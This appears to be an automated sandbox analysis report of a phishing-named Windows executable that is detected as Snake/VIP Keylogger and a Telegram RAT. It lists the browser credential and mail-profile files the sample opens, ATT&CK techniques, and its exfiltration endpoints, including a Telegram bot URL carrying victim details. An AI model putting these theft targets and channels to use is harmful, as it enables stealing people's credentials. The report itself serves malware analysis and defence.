                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7968, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7968, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2990704063.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7968, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7968, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7968, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Valid Accounts                    		Windows Management Instrumentation1
                    Valid Accounts                    		1
                    Valid Accounts                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		1
                    Security Software Discovery                    		Remote Services1
                    Email Collection                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		1
                    Access Token Manipulation                    		1
                    Valid Accounts                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol1
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)211
                    Process Injection                    		1
                    Access Token Manipulation                    		Security Account Manager31
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares1
                    Data from Local System                    		3
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
                    Virtualization/Sandbox Evasion                    		LSA Secrets1
                    System Network Configuration Discovery                    		SSHKeylogging14
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts211
                    Process Injection                    		Cached Domain Credentials13
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Hidden Files and Directories                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job3
                    Obfuscated Files or Information                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Software Packing                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    DLL Side-Loading                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe37%ReversingLabsByteCode-MSIL.Trojan.SnakeStealer
                    RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.founder.com.cn/cn/0%Avira URL Cloudsafe
                    http://ocsp.sectigo.com0B0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    		104.21.48.1
                    		truefalse
                      		high
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high
                        checkip.dyndns.com
                        		193.122.130.0
                        		truefalse
                          		high
                          checkip.dyndns.org
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://reallyfreegeoip.org/xml/8.46.123.189false
                              		high
                              http://checkip.dyndns.org/false
                                		high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813435%0D%0ADate%20and%20Time:%2010/01/2025%20/%2014:05:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813435%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabInstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designersGRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                          		high
                                          http://www.fontbureau.com/designers/?RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/bTheRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.orgInstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                  		high
                                                  http://ocsp.sectigo.com0RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                    		high
                                                    https://api.telegram.org/botRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813435%0D%0ADate%20aInstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designers?RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                            		high
                                                            https://www.office.com/lBInstallUtil.exe, 00000005.00000002.2990704063.0000000002D8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://chrome.google.com/webstore?hl=enpInstallUtil.exe, 00000005.00000002.2990704063.0000000002D52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.tiro.comRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.fontbureau.com/designersRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                                        		high
                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallUtil.exe, 00000005.00000002.2994301420.0000000003F1F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E1C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002CA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.goodfont.co.krRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://chrome.google.com/webstore?hl=enInstallUtil.exe, 00000005.00000002.2990704063.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://varders.kozow.com:8081RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.sajatypeworks.comRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.typography.netDRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.founder.com.cn/cn/cTheRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                                                        		high
                                                                                        http://www.galapagosdesign.com/staff/dennis.htmRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
